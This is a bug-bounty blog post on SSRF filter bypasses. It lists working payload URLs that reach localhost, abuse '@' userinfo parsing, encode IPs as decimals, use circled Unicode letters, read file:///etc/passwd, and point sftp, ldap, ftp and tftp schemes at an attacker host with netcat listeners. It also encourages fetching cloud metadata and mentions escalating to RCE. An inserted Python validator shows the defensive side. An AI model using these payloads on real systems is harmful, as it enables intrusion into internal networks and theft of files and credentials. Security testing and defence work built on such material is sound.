In this post I have shared how I use bypassing logic to convert SSRFs into RCEs and other critical information disclosures, which pays some good bounties $$$, and I have also shared some tools and resources which are very helpful in your testing. Read and scroll, there are a lot of takeaways in this post.
SSRF (Server Side Request Forgery) is a vulnerability where an attacker is able to make the web application issue crafted requests on their behalf. The end goal is to craft requests that fetch data from internal systems which sit behind firewalls, IDS etc. and are inaccessible from outside the organisation.
Types of SSRF:
- Basic : where we get the response of the crafted request.
- Blind : where it doesn't display the response but still triggers the action.
Impact of the vulnerability –
- Scanning of the internal network.
- Read internally hosted files/data.
- Access services listening on the loopback interface (127.0.0.1)
- Read local system files.
- If it’s hosted on AWS, access the AWS REST interface
Let's understand how to learn bypassing in SSRF scenarios so we can chain the bugs into something very critical.
Vulnerabilities are everywhere, but practice and crystal-clear basic knowledge help you build the bypass logic: understanding the basics of how URL parsers work in different environments, etc.
Let’s say we got a basic SSRF in the parameter, ?pageid=
Target URL : http://target.url/home.php?pageid=
Attacker server : http://subhajitsaha.com/blog
So to get reflected XSS we can simply fetch a malicious JS file from an external server.
http://target.url/home.php?pageid=https://subhajitsaha.com/blog/jvv/evilsvgfile.svg
TBH I don't like this, because many times we might not be able to escalate reflected XSS, but sometimes we can do some really good escalations; it totally depends on your scenario.
Bypassing : Finding the internal services
http://target.url/home.php?pageid=http://localhost/anyinternalapps/admin.php
It can lead to scanning the internal running services. But most of the time localhost is in the blacklist category, so we need to find some other way to get in. My last SSRF submission led me into Elasticsearch, an internal service of theirs running without authentication.
pageid=http://127.0.0.1
pageid=http://localhost
For this, other payloads can be used for bypassing:
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
We can also use the host http://spoofed.burpcollaborator.net, which points to 127.0.0.1 / localhost. You can create your own custom subdomain, add a DNS A record and point the host to 127.0.0.1. Just that simple.
Also check out nip.io: it helps you create custom domain mappings so you don't need to edit the /etc/hosts file frequently. Whether you are doing Hack The Box challenges or black-box approaches, it helps a lot.
Abusing the parsers:
http://target.url/home.php?pageid=http://target.url#@subhajitsaha.com/blog
http://target.url:80\@subhajitsaha.com/blog:80/
http://target.url:80\@@subhajitsaha.com/blog:80/
http://target.url:80:\@@subhajitsaha.com/blog:80/
http://target.url:80#\@subhajitsaha.com/blog:80/
Here, http://target.url sees its own domain/IP at the start of the URL and treats it as a legitimate request, as no third-party / attacker domain appears there. But because we are using '@', the URL parser that actually makes the request treats everything before the '@' as userinfo and sends the request to the attacker domain. This is how we can abuse the parsers: different parsers parse URL schemas differently.
I am attaching the research of Orange Tsai, which is incredible and which he has presented at many conferences. Here is the link to view.
Abusing the parser with IP conversion :
We can abuse the parser by converting the IP address (its four 8-bit octets) into a single decimal number.
I use this tool https://www.browserling.com/tools/ip-to-dec to convert IP addresses into decimals.
For example :
http://target.url/home.php?pageid=http://127.0.0.1 to http://target.url/home.php?pageid=http://2130706433
IP conversions and encoding bypass blacklisted strings.
Sometimes double encoding also works for bypassing.
There are a few other ways, using URL schemes:
file://
http://target.url/home.php?pageid=file:///etc/passwd
http://target.url/home.php?pageid=file://\/\/etc/passwd
sftp : http://target.url/home.php?pageid=sftp://subhajitsaha.com/blog:1337
subhajitsaha.com/blog:$ nc -lvp 1337
ldap : http://target.url/home.php?pageid=ldap://subhajitsaha.com/blog:1337 (ldaps , ldapi)
subhajitsaha.com/blog:$ nc -lvp 1337
ftp : http://target.url/home.php?pageid=ftp://subhajitsaha.com/blog:1337
subhajitsaha.com/blog:$ nc -lvp 1337
tftp : http://target.url/home.php?pageid=tftp://subhajitsaha.com/blog:1337
subhajitsaha.com/blog:$ nc -lvp 1337
Bypassing : By using Unicode circles
http://target.url/home.php?pageid=http://ⓢⓤⓑⓗⓐⓙⓘⓣⓢⓐⓗⓐ.ⓒⓞⓜ
Surprisingly, it works. The URL parser normalises the Unicode circled characters into plain text.
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
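As an added example (this is not code from the original post), here is a Python validator for a ?pageid= style fetcher that shows the defender's side of the sections above: a naive substring blacklist of the kind the loopback / spoofed-DNS, parser-@, decimal-IP, URL-scheme and Unicode-circle payloads all get past, next to a hardened check that allow-lists http(s), rejects userinfo, NFKC-normalises the host, decodes the inet_aton single-integer IP form, and classifies every resolved address instead of the string. The DNS table (DEMO_DNS), the public addresses and the stand-in resolver are constructed so the demo runs offline; spoofed.burpcollaborator.net is mapped to 127.0.0.1 as the post describes, and the link-local address is the range used by cloud metadata services.

```python
"""Added example, not code from the original post: a naive blacklist of the kind
the post bypasses, next to a hardened validator for a ?pageid= style fetcher.
Host names, addresses and the stub DNS table are constructed for the demo."""
import ipaddress
import re
import socket
import unicodedata
from urllib.parse import urlsplit

# Constructed DNS table so the demo runs offline. spoofed.burpcollaborator.net
# is mapped to 127.0.0.1 as the post describes; the public addresses are made up.
DEMO_DNS = {
    "subhajitsaha.com": ["1.2.3.4"],
    "target.url": ["5.6.7.8"],
    "spoofed.burpcollaborator.net": ["127.0.0.1"],
}


def demo_resolver(host):
    """Stand-in for DNS: raises like getaddrinfo does for an unknown name."""
    if host not in DEMO_DNS:
        raise socket.gaierror(f"constructed resolver: no record for {host}")
    return DEMO_DNS[host]


def system_resolver(host):
    """Resolve with the same call the HTTP client would use (getaddrinfo)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def naive_is_allowed(url):
    """Substring blacklist on the raw string: every bypass in the post defeats it."""
    lowered = url.lower()
    return not any(bad in lowered for bad in ("localhost", "127.0.0.1", "0.0.0.0", "file://"))


def normalise_host(host):
    """NFKC folds circled letters (ⓢ -> s); the IDNA codec applies the same
    mapping before a DNS lookup, so validate the form DNS will actually see."""
    return unicodedata.normalize("NFKC", host).lower()


def literal_ip(host):
    """Dotted IPv4/IPv6 literal, or the inet_aton single-integer form
    (2130706433 -> 127.0.0.1); None if the host is a name."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    if re.fullmatch(r"\d+", host) and int(host) < 2**32:
        return ipaddress.IPv4Address(int(host))
    return None


def is_public(addr):
    """Reject loopback, RFC1918, link-local (cloud metadata), 0.0.0.0, etc."""
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_unspecified or addr.is_reserved or addr.is_multicast)


def hardened_is_allowed(url, resolver=system_resolver):
    """Allow only http(s) URLs whose host maps exclusively to public addresses.
    Fetch with the same parser and re-apply this check on every redirect hop."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):   # no file:, sftp:, ldap:, ftp:, tftp:
        return False
    if parts.username is not None or parts.password is not None:
        return False                             # "target.url:80\@attacker" is userinfo
    if not parts.hostname:
        return False
    host = normalise_host(parts.hostname)
    addr = literal_ip(host)
    try:
        addrs = [addr] if addr else [ipaddress.ip_address(a) for a in resolver(host)]
    except (socket.gaierror, ValueError):
        return False                             # unresolvable: fail closed
    return all(is_public(a) for a in addrs)


# pageid= values from the post (decimal IP, spoofed DNS, backslash-@, URL scheme,
# circled letters) plus a link-local address as used by cloud metadata services.
PAYLOADS = [
    "http://127.0.0.1",
    "http://2130706433",
    "http://spoofed.burpcollaborator.net",
    "http://target.url:80\\@subhajitsaha.com/blog:80/",
    "sftp://subhajitsaha.com/blog:1337",
    "file:///etc/passwd",
    "http://ⓢⓤⓑⓗⓐⓙⓘⓣⓢⓐⓗⓐ.ⓒⓞⓜ",
    "http://169.254.169.254/",
    "https://subhajitsaha.com/blog/",
]


def run_demo(resolver=demo_resolver):
    """Return {url: (naive verdict, hardened verdict)} for every payload."""
    return {u: (naive_is_allowed(u), hardened_is_allowed(u, resolver)) for u in PAYLOADS}


if __name__ == "__main__":
    for url, (naive, hardened) in run_demo().items():
        print(f"naive={naive!s:5} hardened={hardened!s:5} {url}")
```

Run it and only the two requests to a public host survive the hardened check, while the naive blacklist lets seven of the nine through. The circled-letter URL is allowed by the hardened check because after normalisation it is simply subhajitsaha.com, which is the point: the decision is made on the name the resolver will see, not on the bytes in the parameter. The decimal form is caught because the literal is decoded the way inet_aton would decode it, and the spoofed hostname is caught because the resolved address, not the name, is what gets classified.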
Hope this helps you understand how bypasses can be done. Keep all these payloads in your notes, or, the best way, make a bash script that automates and generates the payloads for you from 2 user inputs, i.e. targeturl and attackerurl; hope I will put that on my GitHub soon. Also, if the target is on a cloud instance, try fetching the metadata.
A week ago @dorkerdevil and I were testing an SSRF parameter and we escalated it to RCE (Remote Code Execution), which is a priority 1 bug.
Hope I have shared some content worth reading.
Share it with people, it motivates me to write more posts.
Thanks for reading!
Also read: https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158